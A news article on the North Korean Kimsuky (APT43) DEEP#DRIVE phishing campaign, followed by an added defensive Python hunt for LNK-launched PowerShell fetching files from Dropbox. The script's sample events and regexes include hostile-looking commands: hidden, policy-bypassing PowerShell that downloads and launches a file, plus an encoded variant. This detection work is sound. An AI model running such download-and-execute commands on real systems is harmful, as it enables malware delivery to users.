
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.

"Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments," security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a "sophisticated and multi-stage operation."

The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are disguised as work logs, insurance documents, and crypto-related files to trick recipients into opening them, thereby triggering the infection process.

The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It's also characterized by the use of Dropbox for payload distribution and data exfiltration.

It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while stealthily establishing…
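The first stage described above (a shortcut launched from Explorer that spawns PowerShell to pull a lure from Dropbox) leaves a recognisable trace in process-creation telemetry: a shell or archiver parent, PowerShell with hidden-window and policy-bypass flags, a download cradle, and a Dropbox URL, sometimes buried inside an -EncodedCommand blob. The hunt below is an added example written for this article, not code from the Securonix report or from the campaign; it assumes events already normalised into dicts with Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine), and the sample records are constructed for illustration rather than taken from DEEP#DRIVE.

```python
"""Hunt for the LNK -> PowerShell -> Dropbox pattern in process-creation telemetry.

Added example for this article, not Securonix's or the threat actor's code.
Assumes events normalised to dicts with Sysmon Event ID 1 style fields
(ParentImage, Image, CommandLine); the sample events are constructed.
"""
import base64
import re

POWERSHELL = ("powershell.exe", "pwsh.exe")
# Processes that launch a shortcut's target when a user double-clicks a .LNK
# extracted from an archive (Explorer, or the archiver's own GUI). Assumed list.
LNK_LAUNCH_PARENTS = ("explorer.exe", "7zfm.exe", "winrar.exe")

DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|invoke-restmethod|\birm\b)",
    re.IGNORECASE,
)
DROPBOX_URL = re.compile(
    r"""https?://(?:[\w.-]+\.)?dropbox(?:usercontent)?\.com/[^\s'"]*""", re.IGNORECASE
)
HIDDEN_FLAGS = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)
# -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload if the command line carries one, else ''."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the indicators matched by one process-creation event (empty list = nothing seen)."""
    if _basename(ev.get("Image", "")) not in POWERSHELL:
        return []
    hits = []
    if _basename(ev.get("ParentImage", "")) in LNK_LAUNCH_PARENTS:
        hits.append("powershell spawned by shell/archiver (shortcut launch)")
    visible = ev.get("CommandLine", "")
    decoded = decode_encoded_command(visible)
    text = visible + "\n" + decoded  # inspect the decoded script alongside the visible args
    if decoded:
        hits.append("encoded command")
    if HIDDEN_FLAGS.search(text):
        hits.append("hidden window / policy bypass flags")
    if DOWNLOAD_CRADLE.search(text):
        hits.append("download cradle")
    for url in DROPBOX_URL.findall(text):
        hits.append(f"dropbox url: {url}")
    return hits


def hunt(events: list[dict], min_hits: int = 3) -> list[tuple[str, list[str]]]:
    """Flag events that match at least min_hits indicators; returns (event id, indicators)."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_hits:
            flagged.append((ev.get("id", "?"), hits))
    return flagged


# Constructed sample telemetry (not real campaign data).
_MALICIOUS_SCRIPT = (
    "$u='https://dl.dropboxusercontent.com/s/example/lure.hwp';"
    "iwr $u -OutFile $env:TEMP\\lure.hwp; Start-Process $env:TEMP\\lure.hwp"
)
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_EXE,
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # admin script
    {"id": "evt-2", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iwr "
                    "'https://www.dropbox.com/scl/fi/abc/doc.hwp?dl=1' -OutFile $env:TEMP\\doc.hwp\""},
    {"id": "evt-3", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(_MALICIOUS_SCRIPT)},
    {"id": "evt-4", "ParentImage": r"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe",
     "Image": r"C:\Program Files (x86)\Dropbox\Client\DropboxUpdate.exe",
     "CommandLine": "DropboxUpdate.exe /check"},  # legitimate Dropbox client, not PowerShell
]

if __name__ == "__main__":
    for event_id, indicators in hunt(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(indicators))
```

Requiring several indicators at once (min_hits) is what keeps this from firing on every admin who runs Invoke-WebRequest; the decode step matters because the Dropbox URL in evt-3 never appears in the visible command line, only inside the UTF-16LE base64 payload.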

